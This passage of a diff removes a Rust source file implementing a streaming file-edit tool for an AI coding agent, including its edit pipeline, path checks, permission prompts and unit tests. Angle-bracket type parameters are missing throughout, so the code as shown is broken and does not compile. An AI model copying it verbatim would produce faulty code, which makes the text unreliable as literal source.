replaces it with `new_text`. - #[serde( - default, - skip_serializing_if = "Option::is_none", - deserialize_with = "deserialize_maybe_stringified" - )] - pub edits: Option>, -} - -#[derive(Clone, Copy, Debug, Serialize, Deserialize, JsonSchema)] -#[serde(rename_all = "snake_case")] -pub enum StreamingEditFileMode { - /// Overwrite the file with new content (replacing any existing content). - /// If the file does not exist, it will be created. - Write, - /// Make granular edits to an existing file - Edit, -} - -/// A single edit operation that replaces old text with new text -/// Properly escape all text fields as valid JSON strings. -/// Remember to escape special characters like newlines (`\n`) and quotes (`"`) in JSON strings. -#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] -pub struct Edit { - /// The exact text to find in the file. This will be matched using fuzzy matching - /// to handle minor differences in whitespace or formatting. - /// - /// Be minimal with replacements: - /// - For unique lines, include only those lines - /// - For non-unique lines, include enough context to identify them - pub old_text: String, - /// The text to replace it with - pub new_text: String, -} - -#[derive(Clone, Default, Debug, Deserialize)] -struct StreamingEditFileToolPartialInput { - #[serde(default)] - display_description: Option, - #[serde(default)] - path: Option, - #[serde(default, deserialize_with = "deserialize_maybe_stringified")] - mode: Option, - #[serde(default)] - content: Option, - #[serde(default, deserialize_with = "deserialize_maybe_stringified")] - edits: Option>, -} - -#[derive(Clone, Default, Debug, Deserialize)] -pub struct PartialEdit { - #[serde(default)] - pub old_text: Option, - #[serde(default)] - pub new_text: Option, -} - -#[derive(Deserialize)] -#[serde(untagged)] -enum ValueOrJsonString { - Value(T), - String(String), -} - -fn deserialize_maybe_stringified<'de, T, D>(deserializer: D) -> Result -where - T: DeserializeOwned, - D: Deserializer<'de>, -{ - match ValueOrJsonString::::deserialize(deserializer)? { - ValueOrJsonString::Value(value) => Ok(value), - ValueOrJsonString::String(string) => serde_json::from_str::(&string).map_err(|error| { - D::Error::custom(format!("failed to parse stringified value: {error}")) - }), - } -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(untagged)] -pub enum StreamingEditFileToolOutput { - Success { - #[serde(alias = "original_path")] - input_path: PathBuf, - new_text: String, - old_text: Arc, - #[serde(default)] - diff: String, - }, - Error { - error: String, - #[serde(default, skip_serializing_if = "Option::is_none")] - input_path: Option, - #[serde(default, skip_serializing_if = "String::is_empty")] - diff: String, - }, -} - -impl StreamingEditFileToolOutput { - pub fn error(error: impl Into) -> Self { - Self::Error { - error: error.into(), - input_path: None, - diff: String::new(), - } - } -} - -impl std::fmt::Display for StreamingEditFileToolOutput { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - match self { - StreamingEditFileToolOutput::Success { - diff, input_path, .. - } => { - if diff.is_empty() { - write!(f, "No edits were made.") - } else { - write!( - f, - "Edited {}:\n\n```diff\n{diff}\n```", - input_path.display() - ) - } - } - StreamingEditFileToolOutput::Error { - error, - diff, - input_path, - } => { - write!(f, "{error}\n")?; - if let Some(input_path) = input_path - && !diff.is_empty() - { - write!( - f, - "Edited {}:\n\n```diff\n{diff}\n```", - input_path.display() - ) - } else { - write!(f, "No edits were made.") - } - } - } - } -} - -impl From for LanguageModelToolResultContent { - fn from(output: StreamingEditFileToolOutput) -> Self { - output.to_string().into() - } -} - -pub struct StreamingEditFileTool { - project: Entity, - thread: WeakEntity, - action_log: Entity, - language_registry: Arc, -} - -enum EditSessionResult { - Completed(EditSession), - Failed { - error: String, - session: Option, - }, -} - -impl StreamingEditFileTool { - pub fn new( - project: Entity, - thread: WeakEntity, - action_log: Entity, - language_registry: Arc, - ) -> Self { - Self { - project, - thread, - action_log, - language_registry, - } - } - - fn authorize( - &self, - path: &PathBuf, - description: &str, - event_stream: &ToolCallEventStream, - cx: &mut App, - ) -> Task> { - super::tool_permissions::authorize_file_edit( - EditFileTool::NAME, - path, - description, - &self.thread, - event_stream, - cx, - ) - } - - fn set_agent_location(&self, buffer: WeakEntity, position: text::Anchor, cx: &mut App) { - let should_update_agent_location = self - .thread - .read_with(cx, |thread, _cx| !thread.is_subagent()) - .unwrap_or_default(); - if should_update_agent_location { - self.project.update(cx, |project, cx| { - project.set_agent_location(Some(AgentLocation { buffer, position }), cx); - }); - } - } - - async fn ensure_buffer_saved(&self, buffer: &Entity, cx: &mut AsyncApp) { - let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { - let settings = language_settings::LanguageSettings::for_buffer(buffer, cx); - settings.format_on_save != FormatOnSave::Off - }); - - if format_on_save_enabled { - self.project - .update(cx, |project, cx| { - project.format( - HashSet::from_iter([buffer.clone()]), - LspFormatTarget::Buffers, - false, - FormatTrigger::Save, - cx, - ) - }) - .await - .log_err(); - } - - self.project - .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) - .await - .log_err(); - - self.action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - } - - async fn process_streaming_edits( - &self, - input: &mut ToolInput, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> EditSessionResult { - let mut session: Option = None; - let mut last_partial: Option = None; - - loop { - futures::select! { - payload = input.next().fuse() => { - match payload { - Ok(payload) => match payload { - ToolInputPayload::Partial(partial) => { - if let Ok(parsed) = serde_json::from_value::(partial) { - let path_complete = parsed.path.is_some() - && parsed.path.as_ref() == last_partial.as_ref().and_then(|partial| partial.path.as_ref()); - - last_partial = Some(parsed.clone()); - - if session.is_none() - && path_complete - && let StreamingEditFileToolPartialInput { - path: Some(path), - display_description: Some(display_description), - mode: Some(mode), - .. - } = &parsed - { - match EditSession::new( - PathBuf::from(path), - display_description, - *mode, - self, - event_stream, - cx, - ) - .await - { - Ok(created_session) => session = Some(created_session), - Err(error) => { - log::error!("Failed to create edit session: {}", error); - return EditSessionResult::Failed { - error, - session: None, - }; - } - } - } - - if let Some(current_session) = &mut session - && let Err(error) = current_session.process(parsed, self, event_stream, cx) - { - log::error!("Failed to process edit: {}", error); - return EditSessionResult::Failed { error, session }; - } - } - } - ToolInputPayload::Full(full_input) => { - let mut session = if let Some(session) = session { - session - } else { - match EditSession::new( - full_input.path.clone(), - &full_input.display_description, - full_input.mode, - self, - event_stream, - cx, - ) - .await - { - Ok(created_session) => created_session, - Err(error) => { - log::error!("Failed to create edit session: {}", error); - return EditSessionResult::Failed { - error, - session: None, - }; - } - } - }; - - return match session.finalize(full_input, self, event_stream, cx).await { - Ok(()) => EditSessionResult::Completed(session), - Err(error) => { - log::error!("Failed to finalize edit: {}", error); - EditSessionResult::Failed { - error, - session: Some(session), - } - } - }; - } - ToolInputPayload::InvalidJson { error_message } => { - log::error!("Received invalid JSON: {error_message}"); - return EditSessionResult::Failed { - error: error_message, - session, - }; - } - }, - Err(error) => { - return EditSessionResult::Failed { - error: format!("Failed to receive tool input: {error}"), - session, - }; - } - } - } - _ = event_stream.cancelled_by_user().fuse() => { - return EditSessionResult::Failed { - error: "Edit cancelled by user".to_string(), - session, - }; - } - } - } - } -} - -impl AgentTool for StreamingEditFileTool { - type Input = StreamingEditFileToolInput; - type Output = StreamingEditFileToolOutput; - - const NAME: &'static str = "streaming_edit_file"; - - fn supports_input_streaming() -> bool { - true - } - - fn kind() -> acp::ToolKind { - acp::ToolKind::Edit - } - - fn initial_title( - &self, - input: Result, - cx: &mut App, - ) -> SharedString { - match input { - Ok(input) => self - .project - .read(cx) - .find_project_path(&input.path, cx) - .and_then(|project_path| { - self.project - .read(cx) - .short_full_path_for_project_path(&project_path, cx) - }) - .unwrap_or(input.path.to_string_lossy().into_owned()) - .into(), - Err(raw_input) => { - if let Ok(input) = - serde_json::from_value::(raw_input) - { - let path = input.path.unwrap_or_default(); - let path = path.trim(); - if !path.is_empty() { - return self - .project - .read(cx) - .find_project_path(&path, cx) - .and_then(|project_path| { - self.project - .read(cx) - .short_full_path_for_project_path(&project_path, cx) - }) - .unwrap_or_else(|| path.to_string()) - .into(); - } - - let description = input.display_description.unwrap_or_default(); - let description = description.trim(); - if !description.is_empty() { - return description.to_string().into(); - } - } - - DEFAULT_UI_TEXT.into() - } - } - } - - fn run( - self: Arc, - mut input: ToolInput, - event_stream: ToolCallEventStream, - cx: &mut App, - ) -> Task> { - cx.spawn(async move |cx: &mut AsyncApp| { - match self - .process_streaming_edits(&mut input, &event_stream, cx) - .await - { - EditSessionResult::Completed(session) => { - self.ensure_buffer_saved(&session.buffer, cx).await; - let (new_text, diff) = session.compute_new_text_and_diff(cx).await; - Ok(StreamingEditFileToolOutput::Success { - old_text: session.old_text.clone(), - new_text, - input_path: session.input_path, - diff, - }) - } - EditSessionResult::Failed { - error, - session: Some(session), - } => { - self.ensure_buffer_saved(&session.buffer, cx).await; - let (_new_text, diff) = session.compute_new_text_and_diff(cx).await; - Err(StreamingEditFileToolOutput::Error { - error, - input_path: Some(session.input_path), - diff, - }) - } - EditSessionResult::Failed { - error, - session: None, - } => Err(StreamingEditFileToolOutput::Error { - error, - input_path: None, - diff: String::new(), - }), - } - }) - } - - fn replay( - &self, - _input: Self::Input, - output: Self::Output, - event_stream: ToolCallEventStream, - cx: &mut App, - ) -> Result<()> { - match output { - StreamingEditFileToolOutput::Success { - input_path, - old_text, - new_text, - .. - } => { - event_stream.update_diff(cx.new(|cx| { - Diff::finalized( - input_path.to_string_lossy().into_owned(), - Some(old_text.to_string()), - new_text, - self.language_registry.clone(), - cx, - ) - })); - Ok(()) - } - StreamingEditFileToolOutput::Error { .. } => Ok(()), - } - } -} - -pub struct EditSession { - abs_path: PathBuf, - input_path: PathBuf, - buffer: Entity, - old_text: Arc, - diff: Entity, - mode: StreamingEditFileMode, - parser: ToolEditParser, - pipeline: EditPipeline, - file_changed_since_last_read: bool, - _finalize_diff_guard: Deferred>, -} - -struct EditPipeline { - current_edit: Option, - content_written: bool, -} - -enum EditPipelineEntry { - ResolvingOldText { - matcher: StreamingFuzzyMatcher, - }, - StreamingNewText { - streaming_diff: StreamingDiff, - edit_cursor: usize, - reindenter: Reindenter, - original_snapshot: text::BufferSnapshot, - }, -} - -impl EditPipeline { - fn new() -> Self { - Self { - current_edit: None, - content_written: false, - } - } - - fn ensure_resolving_old_text(&mut self, buffer: &Entity, cx: &mut AsyncApp) { - if self.current_edit.is_none() { - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); - self.current_edit = Some(EditPipelineEntry::ResolvingOldText { - matcher: StreamingFuzzyMatcher::new(snapshot), - }); - } - } -} - -impl EditSession { - async fn new( - path: PathBuf, - display_description: &str, - mode: StreamingEditFileMode, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result { - let project_path = cx.update(|cx| resolve_path(mode, &path, &tool.project, cx))?; - - let Some(abs_path) = cx.update(|cx| tool.project.read(cx).absolute_path(&project_path, cx)) - else { - return Err(format!( - "Worktree at '{}' does not exist", - path.to_string_lossy() - )); - }; - - event_stream.update_fields( - ToolCallUpdateFields::new().locations(vec![ToolCallLocation::new(abs_path.clone())]), - ); - - cx.update(|cx| tool.authorize(&path, &display_description, event_stream, cx)) - .await - .map_err(|e| e.to_string())?; - - let buffer = tool - .project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await - .map_err(|e| e.to_string())?; - - let file_changed_since_last_read = ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; - - let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); - event_stream.update_diff(diff.clone()); - let finalize_diff_guard = util::defer(Box::new({ - let diff = diff.downgrade(); - let mut cx = cx.clone(); - move || { - diff.update(&mut cx, |diff, cx| diff.finalize(cx)).ok(); - } - }) as Box); - - tool.action_log.update(cx, |log, cx| match mode { - StreamingEditFileMode::Write => log.buffer_created(buffer.clone(), cx), - StreamingEditFileMode::Edit => log.buffer_read(buffer.clone(), cx), - }); - - let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let old_text = cx - .background_spawn({ - let old_snapshot = old_snapshot.clone(); - async move { Arc::new(old_snapshot.text()) } - }) - .await; - - Ok(Self { - abs_path, - input_path: path, - buffer, - old_text, - diff, - mode, - parser: ToolEditParser::default(), - pipeline: EditPipeline::new(), - file_changed_since_last_read, - _finalize_diff_guard: finalize_diff_guard, - }) - } - - async fn finalize( - &mut self, - input: StreamingEditFileToolInput, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result<(), String> { - match input.mode { - StreamingEditFileMode::Write => { - let content = input - .content - .ok_or_else(|| "'content' field is required for write mode".to_string())?; - - let events = self.parser.finalize_content(&content); - self.process_events(&events, tool, event_stream, cx)?; - } - StreamingEditFileMode::Edit => { - let edits = input - .edits - .ok_or_else(|| "'edits' field is required for edit mode".to_string())?; - let events = self.parser.finalize_edits(&edits); - self.process_events(&events, tool, event_stream, cx)?; - - if log::log_enabled!(log::Level::Debug) { - log::debug!("Got edits:"); - for edit in &edits { - log::debug!( - " old_text: '{}', new_text: '{}'", - edit.old_text.replace('\n', "\\n"), - edit.new_text.replace('\n', "\\n") - ); - } - } - } - } - Ok(()) - } - - async fn compute_new_text_and_diff(&self, cx: &mut AsyncApp) -> (String, String) { - let new_snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let (new_text, unified_diff) = cx - .background_spawn({ - let new_snapshot = new_snapshot.clone(); - let old_text = self.old_text.clone(); - async move { - let new_text = new_snapshot.text(); - let diff = language::unified_diff(&old_text, &new_text); - (new_text, diff) - } - }) - .await; - (new_text, unified_diff) - } - - fn process( - &mut self, - partial: StreamingEditFileToolPartialInput, - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result<(), String> { - match &self.mode { - StreamingEditFileMode::Write => { - if let Some(content) = &partial.content { - let events = self.parser.push_content(content); - self.process_events(&events, tool, event_stream, cx)?; - } - } - StreamingEditFileMode::Edit => { - if let Some(edits) = partial.edits { - let events = self.parser.push_edits(&edits); - self.process_events(&events, tool, event_stream, cx)?; - } - } - } - Ok(()) - } - - fn process_events( - &mut self, - events: &[ToolEditEvent], - tool: &StreamingEditFileTool, - event_stream: &ToolCallEventStream, - cx: &mut AsyncApp, - ) -> Result<(), String> { - for event in events { - match event { - ToolEditEvent::ContentChunk { chunk } => { - let (buffer_id, buffer_len) = self - .buffer - .read_with(cx, |buffer, _cx| (buffer.remote_id(), buffer.len())); - let edit_range = if self.pipeline.content_written { - buffer_len..buffer_len - } else { - 0..buffer_len - }; - - agent_edit_buffer( - &self.buffer, - [(edit_range, chunk.as_str())], - &tool.action_log, - cx, - ); - cx.update(|cx| { - tool.set_agent_location( - self.buffer.downgrade(), - text::Anchor::max_for_buffer(buffer_id), - cx, - ); - }); - self.pipeline.content_written = true; - } - - ToolEditEvent::OldTextChunk { - chunk, done: false, .. - } => { - log::debug!("old_text_chunk: done=false, chunk='{}'", chunk); - self.pipeline.ensure_resolving_old_text(&self.buffer, cx); - - if let Some(EditPipelineEntry::ResolvingOldText { matcher }) = - &mut self.pipeline.current_edit - && !chunk.is_empty() - { - if let Some(match_range) = matcher.push(chunk, None) { - let anchor_range = self.buffer.read_with(cx, |buffer, _cx| { - buffer.anchor_range_outside(match_range.clone()) - }); - self.diff - .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); - - cx.update(|cx| { - let position = self.buffer.read(cx).anchor_before(match_range.end); - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - } - } - - ToolEditEvent::OldTextChunk { - edit_index, - chunk, - done: true, - } => { - log::debug!("old_text_chunk: done=true, chunk='{}'", chunk); - - self.pipeline.ensure_resolving_old_text(&self.buffer, cx); - - let Some(EditPipelineEntry::ResolvingOldText { matcher }) = - &mut self.pipeline.current_edit - else { - continue; - }; - - if !chunk.is_empty() { - matcher.push(chunk, None); - } - let range = extract_match( - matcher.finish(), - &self.buffer, - edit_index, - self.file_changed_since_last_read, - cx, - )?; - - let anchor_range = self - .buffer - .read_with(cx, |buffer, _cx| buffer.anchor_range_outside(range.clone())); - self.diff - .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); - - let snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - - let line = snapshot.offset_to_point(range.start).row; - event_stream.update_fields( - ToolCallUpdateFields::new().locations(vec![ - ToolCallLocation::new(&self.abs_path).line(Some(line)), - ]), - ); - - let buffer_indent = snapshot.line_indent_for_row(line); - let query_indent = text::LineIndent::from_iter( - matcher - .query_lines() - .first() - .map(|s| s.as_str()) - .unwrap_or("") - .chars(), - ); - let indent_delta = compute_indent_delta(buffer_indent, query_indent); - - let old_text_in_buffer = - snapshot.text_for_range(range.clone()).collect::(); - - log::debug!( - "edit[{}] old_text matched at {}..{}: {:?}", - edit_index, - range.start, - range.end, - old_text_in_buffer, - ); - - let text_snapshot = self - .buffer - .read_with(cx, |buffer, _cx| buffer.text_snapshot()); - self.pipeline.current_edit = Some(EditPipelineEntry::StreamingNewText { - streaming_diff: StreamingDiff::new(old_text_in_buffer), - edit_cursor: range.start, - reindenter: Reindenter::new(indent_delta), - original_snapshot: text_snapshot, - }); - - cx.update(|cx| { - let position = self.buffer.read(cx).anchor_before(range.end); - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - - ToolEditEvent::NewTextChunk { - chunk, done: false, .. - } => { - log::debug!("new_text_chunk: done=false, chunk='{}'", chunk); - - let Some(EditPipelineEntry::StreamingNewText { - streaming_diff, - edit_cursor, - reindenter, - original_snapshot, - .. - }) = &mut self.pipeline.current_edit - else { - continue; - }; - - let reindented = reindenter.push(chunk); - if reindented.is_empty() { - continue; - } - - let char_ops = streaming_diff.push_new(&reindented); - apply_char_operations( - &char_ops, - &self.buffer, - original_snapshot, - edit_cursor, - &tool.action_log, - cx, - ); - - let position = original_snapshot.anchor_before(*edit_cursor); - cx.update(|cx| { - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - - ToolEditEvent::NewTextChunk { - chunk, done: true, .. - } => { - log::debug!("new_text_chunk: done=true, chunk='{}'", chunk); - - let Some(EditPipelineEntry::StreamingNewText { - mut streaming_diff, - mut edit_cursor, - mut reindenter, - original_snapshot, - }) = self.pipeline.current_edit.take() - else { - continue; - }; - - // Flush any remaining reindent buffer + final chunk. - let mut final_text = reindenter.push(chunk); - final_text.push_str(&reindenter.finish()); - - log::debug!("new_text_chunk: done=true, final_text='{}'", final_text); - - if !final_text.is_empty() { - let char_ops = streaming_diff.push_new(&final_text); - apply_char_operations( - &char_ops, - &self.buffer, - &original_snapshot, - &mut edit_cursor, - &tool.action_log, - cx, - ); - } - - let remaining_ops = streaming_diff.finish(); - apply_char_operations( - &remaining_ops, - &self.buffer, - &original_snapshot, - &mut edit_cursor, - &tool.action_log, - cx, - ); - - let position = original_snapshot.anchor_before(edit_cursor); - cx.update(|cx| { - tool.set_agent_location(self.buffer.downgrade(), position, cx); - }); - } - } - } - Ok(()) - } -} - -fn apply_char_operations( - ops: &[CharOperation], - buffer: &Entity, - snapshot: &text::BufferSnapshot, - edit_cursor: &mut usize, - action_log: &Entity, - cx: &mut AsyncApp, -) { - for op in ops { - match op { - CharOperation::Insert { text } => { - let anchor = snapshot.anchor_after(*edit_cursor); - agent_edit_buffer(&buffer, [(anchor..anchor, text.as_str())], action_log, cx); - } - CharOperation::Delete { bytes } => { - let delete_end = *edit_cursor + bytes; - let anchor_range = snapshot.anchor_range_inside(*edit_cursor..delete_end); - agent_edit_buffer(&buffer, [(anchor_range, "")], action_log, cx); - *edit_cursor = delete_end; - } - CharOperation::Keep { bytes } => { - *edit_cursor += bytes; - } - } - } -} - -fn extract_match( - matches: Vec>, - buffer: &Entity, - edit_index: &usize, - file_changed_since_last_read: bool, - cx: &mut AsyncApp, -) -> Result, String> { - let file_changed_since_last_read_message = if file_changed_since_last_read { - " The file has changed on disk since you last read it." - } else { - "" - }; - - match matches.len() { - 0 => Err(format!( - "Could not find matching text for edit at index {}. \ - The old_text did not match any content in the file.{} \ - Please read the file again to get the current content.", - edit_index, file_changed_since_last_read_message, - )), - 1 => Ok(matches.into_iter().next().unwrap()), - _ => { - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - let lines = matches - .iter() - .map(|r| (snapshot.offset_to_point(r.start).row + 1).to_string()) - .collect::>() - .join(", "); - Err(format!( - "Edit {} matched multiple locations in the file at lines: {}. \ - Please provide more context in old_text to uniquely \ - identify the location.", - edit_index, lines - )) - } - } -} - -/// Edits a buffer and reports the edit to the action log in the same effect -/// cycle. This ensures the action log's subscription handler sees the version -/// already updated by `buffer_edited`, so it does not misattribute the agent's -/// edit as a user edit. -fn agent_edit_buffer( - buffer: &Entity, - edits: I, - action_log: &Entity, - cx: &mut AsyncApp, -) where - I: IntoIterator, T)>, - S: ToOffset, - T: Into>, -{ - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - buffer.edit(edits, None, cx); - }); - action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - }); -} - -fn ensure_buffer_saved( - buffer: &Entity, - abs_path: &PathBuf, - tool: &StreamingEditFileTool, - cx: &mut AsyncApp, -) -> Result { - let last_read_mtime = tool - .action_log - .read_with(cx, |log, _| log.file_read_time(abs_path)); - let check_result = tool.thread.read_with(cx, |thread, cx| { - let current = buffer - .read(cx) - .file() - .and_then(|file| file.disk_state().mtime()); - let dirty = buffer.read(cx).is_dirty(); - let has_save = thread.has_tool(SaveFileTool::NAME); - let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); - (current, dirty, has_save, has_restore) - }); - - let Ok((current_mtime, is_dirty, has_save_tool, has_restore_tool)) = check_result else { - return Ok(false); - }; - - if is_dirty { - let message = match (has_save_tool, has_restore_tool) { - (true, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (true, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask the user to manually revert the file, then inform you when it's ok to proceed." - } - (false, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask the user to manually save the file, then inform you when it's ok to proceed. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (false, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes, \ - then ask them to save or revert the file manually and inform you when it's ok to proceed." - } - }; - return Err(message.to_string()); - } - - if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) - && current != last_read - { - return Ok(true); - } - - Ok(false) -} - -fn resolve_path( - mode: StreamingEditFileMode, - path: &PathBuf, - project: &Entity, - cx: &mut App, -) -> Result { - let project = project.read(cx); - - match mode { - StreamingEditFileMode::Edit => { - let path = project - .find_project_path(&path, cx) - .ok_or_else(|| "Can't edit file: path not found".to_string())?; - - let entry = project - .entry_for_path(&path, cx) - .ok_or_else(|| "Can't edit file: path not found".to_string())?; - - if entry.is_file() { - Ok(path) - } else { - Err("Can't edit file: path is a directory".to_string()) - } - } - StreamingEditFileMode::Write => { - if let Some(path) = project.find_project_path(&path, cx) - && let Some(entry) = project.entry_for_path(&path, cx) - { - if entry.is_file() { - return Ok(path); - } else { - return Err("Can't write to file: path is a directory".to_string()); - } - } - - let parent_path = path - .parent() - .ok_or_else(|| "Can't create file: incorrect path".to_string())?; - - let parent_project_path = project.find_project_path(&parent_path, cx); - - let parent_entry = parent_project_path - .as_ref() - .and_then(|path| project.entry_for_path(path, cx)) - .ok_or_else(|| "Can't create file: parent directory doesn't exist")?; - - if !parent_entry.is_dir() { - return Err("Can't create file: parent is not a directory".to_string()); - } - - let file_name = path - .file_name() - .and_then(|file_name| file_name.to_str()) - .and_then(|file_name| RelPath::unix(file_name).ok()) - .ok_or_else(|| "Can't create file: invalid filename".to_string())?; - - let new_file_path = parent_project_path.map(|parent| ProjectPath { - path: parent.path.join(file_name), - ..parent - }); - - new_file_path.ok_or_else(|| "Can't create file".to_string()) - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::{ContextServerRegistry, Templates, ToolInputSender}; - use fs::Fs as _; - use futures::StreamExt as _; - use gpui::{TestAppContext, UpdateGlobal}; - use language_model::fake_provider::FakeLanguageModel; - use prompt_store::ProjectContext; - use serde_json::json; - use settings::Settings; - use settings::SettingsStore; - use util::path; - use util::rel_path::rel_path; - - #[gpui::test] - async fn test_streaming_edit_create_file(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Create new file".into(), - path: "root/dir/new_file.txt".into(), - mode: StreamingEditFileMode::Write, - content: Some("Hello, World!".into()), - edits: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { new_text, diff, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "Hello, World!"); - assert!(!diff.is_empty()); - } - - #[gpui::test] - async fn test_streaming_edit_overwrite_file(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "old content"})).await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Overwrite file".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Write, - content: Some("new content".into()), - edits: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { - new_text, old_text, .. - } = result.unwrap() - else { - panic!("expected success"); - }; - assert_eq!(new_text, "new content"); - assert_eq!(*old_text, "old content"); - } - - #[gpui::test] - async fn test_streaming_edit_granular_edits(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "line 2".into(), - new_text: "modified line 2".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); - } - - #[gpui::test] - async fn test_streaming_edit_multiple_edits(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), - ) - .await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit multiple lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - Edit { - old_text: "line 5".into(), - new_text: "modified line 5".into(), - }, - Edit { - old_text: "line 1".into(), - new_text: "modified line 1".into(), - }, - ]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!( - new_text, - "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" - ); - } - - #[gpui::test] - async fn test_streaming_edit_adjacent_edits(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), - ) - .await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit adjacent lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - Edit { - old_text: "line 2".into(), - new_text: "modified line 2".into(), - }, - Edit { - old_text: "line 3".into(), - new_text: "modified line 3".into(), - }, - ]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!( - new_text, - "line 1\nmodified line 2\nmodified line 3\nline 4\nline 5\n" - ); - } - - #[gpui::test] - async fn test_streaming_edit_ascending_order_edits(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), - ) - .await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit multiple lines in ascending order".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - Edit { - old_text: "line 1".into(), - new_text: "modified line 1".into(), - }, - Edit { - old_text: "line 5".into(), - new_text: "modified line 5".into(), - }, - ]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!( - new_text, - "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" - ); - } - - #[gpui::test] - async fn test_streaming_edit_nonexistent_file(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Some edit".into(), - path: "root/nonexistent_file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "foo".into(), - new_text: "bar".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Error { - error, - diff, - input_path, - } = 